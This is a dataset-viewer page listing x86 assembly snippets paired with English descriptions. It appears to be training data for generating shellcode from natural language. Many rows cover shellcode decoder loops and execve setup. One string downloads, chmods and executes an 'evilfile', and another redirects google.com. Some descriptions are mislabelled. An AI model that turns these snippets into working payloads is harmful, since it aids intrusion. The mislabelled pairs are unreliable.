SNIPPETS
stringlengths 2
1.64k
| INTENTS
stringlengths 4
1.66k
|
|---|---|
lea ecx, [eax]
|
load the effective address of the result of the operation [eax] into the ecx register
|
lea ecx, [ebp+28]
|
load the effective address [ebp+28] into ecx
|
lea ecx, [ebp+28]
|
load the effective address of the result of the operation [ebp+28] into the ecx register
|
lea ecx, [ebx+0xff]
|
load the value of ebx+0xff into register ecx
|
lea ecx, [ebx+8]
|
load the effective address of ebx+8 into ecx
|
lea ecx, [esi + 8]
|
load the adress esi+8 into ecx register
|
lea ecx, [esi + 8]
|
load the effective address of the result of the operation [esi + 8] into the ecx register
|
lea ecx, [esi]
|
point ecx to the start of the shellcode
|
lea ecx, [esi+1]
|
point ecx to the next byte of the shellcode
|
lea ecx, [esi+18]
|
load the effective address [esi+18] into ecx
|
lea ecx, [esi+18]
|
load the effective address of the result of the operation [esi+18] into the ecx register
|
lea ecx, [esi+22]
|
load the effective address of the result of the operation [esi+22] into the ecx register
|
lea ecx, [esi+35]
|
load address of ptr to argv[] array into ecx register
|
lea ecx, [esi+35]
|
load the effective address of the result of the operation [esi+35] into the ecx register
|
lea ecx, [esi+8]
|
load the effective address of the result of the operation [esi+8] into the ecx register
|
lea ecx, [esp]
|
load stack pointer to ebx
|
lea ecx, [esp]
|
load esp address into ecx register
|
lea ecx, [esp]
|
load the effective address of esp into the ecx register
|
lea ecx, [zero_reg+117]
|
load the effective address [zero_reg+117] into ecx
|
lea ecx, [zero_reg+117]
|
load the effective address of the result of the operation [zero_reg+117] into the ecx register
|
lea ecx, [zero_reg+3]
|
load the effective address [zero_reg+3] into ecx
|
lea ecx, [zero_reg+3]
|
load the effective address of the result of the operation [zero_reg+3] into the ecx register
|
lea ecx,[esi+0xc]
|
load the address esi+0xc into ecx register
|
lea edi, [ebx]
|
load the effective address [ebx] into edi
|
lea edi, [ebx]
|
load the effective address of ebx into the edi register
|
lea edi, [ebx+4*esi]
|
place the value ebx+4*esi in edi
|
lea edi, [ebx+4*esi]
|
place the quantity ebx+4*esi in edi
|
lea edi, [edi + 2]
|
load the address of edi+2 into edi
|
lea edi, [edi +8]
|
make edi point to rot_value
|
lea edi, [esi + 13]
|
put the byte in the address esi+13 in edi regsiter.
|
lea edi, [esi + 13]
|
load the effective address of the result of the operation [esi + 13] into the edi register
|
lea edi, [esi + 13]
|
load the address at esi + 13 into edi
|
lea edi, [esi +1]
|
transfer the second character pointed from esi to edi
|
lea edi, [esi +1]
|
load the effective address of [esi + 1] into the edi register
|
lea edi, [esi]
|
copy the address of esi in edi
|
lea edi, [esi]
|
load the effective address [esi] into edi
|
lea edi, [esi]
|
load the address of esi into edi
|
lea edi, [esi]
|
point edi to the start of the shellcode
|
lea edi, [esi]
|
load the contents of esi into edi
|
lea edi, [esi+0x1]
|
load the address of esi+0x1 into edi
|
lea edi, [esi+1]
|
point edi to the next byte of the shellcode
|
lea edi, [esi+13]
|
load the effective address of esi+13 into esi+13
|
lea edi,[esi]
|
copy the address of esi into edi register
|
lea edi,[esi+0x1]
|
copy the adress a tesi+0x1 into edi register
|
lea edx, [ebx+12]
|
load the effective address of ebx+12 into edx
|
lea edx, [esi + 12]
|
load the adress esi+12 into edx register
|
lea edx, [esi + 12]
|
load the effective address of the result of the operation [esi + 12] into the edx register
|
lea edx, [esi]
|
point edx to the start of the shellcode
|
lea edx, [esi+1]
|
point edx to the next byte of the shellcode
|
lea edx, [esi+26]
|
load the effective address [esi+26] into edx
|
lea edx, [esi+26]
|
load the effective address of the result of the operation [esi+26] into the edx register
|
lea edx, [esi+30]
|
load the effective address of the result of the operation [esi+30] into the edx register
|
lea edx, [esi+47]
|
load address of ptr to envp[] null into edx register
|
lea edx, [esi+47]
|
load the effective address of the result of the operation [esi+47] into the edx register
|
lea edx,[esi+0x10]
|
load the address esi+0x10 into edx register
|
lea esi, [ebp+20]
|
load the effective address [ebp+20] into esi
|
lea esi, [ebp+20]
|
load the effective address of the result of the operation [ebp+20] into the esi register
|
lea esi, [edi + 8]
|
transfer the eighth character pointed by edi to esi
|
lea esi, [edi +16]
|
make esi register point to shellcode
|
lea esi, [edi +8]
|
make esi point to shellcode that contains previous xorÕed results
|
lea esi, [esi +4]
|
load the effective address of the result of the operation [esi +4] into the esi register
|
lea esi, [esi+2]
|
load the effective address of esi+2 into esi
|
lea esi, [esi+4]
|
load the effective address [esi+4] into esi
|
lea esp, [ebx]
|
load the value of register ebx into register esp
|
lea rdi, [rsp]
|
load the address of the string that is on the stack into rsi
|
len equ $ - msg
|
define len equal to the length of msg
|
len equ $-encodedshellcode
|
define len equal to the lenght of the encodedshellcode array
|
len: equ $-encodedshellcode
|
variable for the lenght of the encoded shellcode
|
len: equ $-google
|
define len = size of db "127.1.1.1 google.com"
|
len: equ $-google
|
declare the len label equal to the size of the google variable
|
len: equ $-shellcode
|
define lenght of shellcode, len
|
len: equ $-shellcode
|
declare the len label equal to the length of shellcode
|
les esp,fword ptr [ebx]
|
loads 32-bit pointer from ebx to esp and fs regster
|
letter_c db 'c'
|
allocate a single byte of memory and initialize it to the letter 'c'
|
line db '/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile', 0x0a
|
define line as the byte string '/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile', 0x0a
|
line db "/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile", 0x0a
|
jump to the _exec label after entering the address of the string ""/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile", 0x0a" at the top of the stack
|
loader:
|
define _loader
|
loader:
|
declare the loader label
|
lods al,byte ptr ds:[esi]
|
transfers string element addressed by esi regoster into al register
|
loop .3
|
decrement the counter and jump to .3 label if the count is not zero
|
loop 3
|
decrement ecx and jumps to the 3 label unless decrementing ecx caused its value to become zero
|
loop bucle
|
decrement the ecx register and jump to the bucle label if the counter is not zero
|
loop check_even_odd
|
loop check_even_odd using ecx for counter
|
loop check_even_odd
|
decrement the count register and jump to check_even_odd if the count is not equal to zero
|
loop check_even_odd \n jmp short shellcode
|
decrease the counter and jump to check_even_odd if not zero else jump short to shellcode
|
loop check_even_odd \n jmp short shellcode
|
decrement the ecx register and jump to the check_even_odd label if the contents of the ecx register is not zero else jump short to the shellcode label
|
loop decode
|
loop decode
|
loop decode
|
start loop decode
|
loop decode
|
loop deocde
|
loop decode
|
loop while zero flag not set
|
loop decode
|
decode current byte
|
loop decode
|
decrement ecx and jumps to the decode label unless decrementing ecx caused its value to become zero
|
loop decode
|
decrement the count register and jump to decode if not equal zero
|
loop decode
|
decrease the counter and jump to decode if not zero
|
loop decode \n jmp edx
|
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the edx register
|
loop decode \n jmp edx
|
decrement the counter and jump to decode if not zero else jump to edx
|
loop decode \n jmp EncodedShellcode
|
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the EncodedShellcode label
|
loop decode \n jmp encodedshellcode
|
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the encodedshellcode label
|
loop decode \n jmp Shellcode
|
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the Shellcode label
|
loop decode \n jmp shellcode
|
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the shellcode label
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.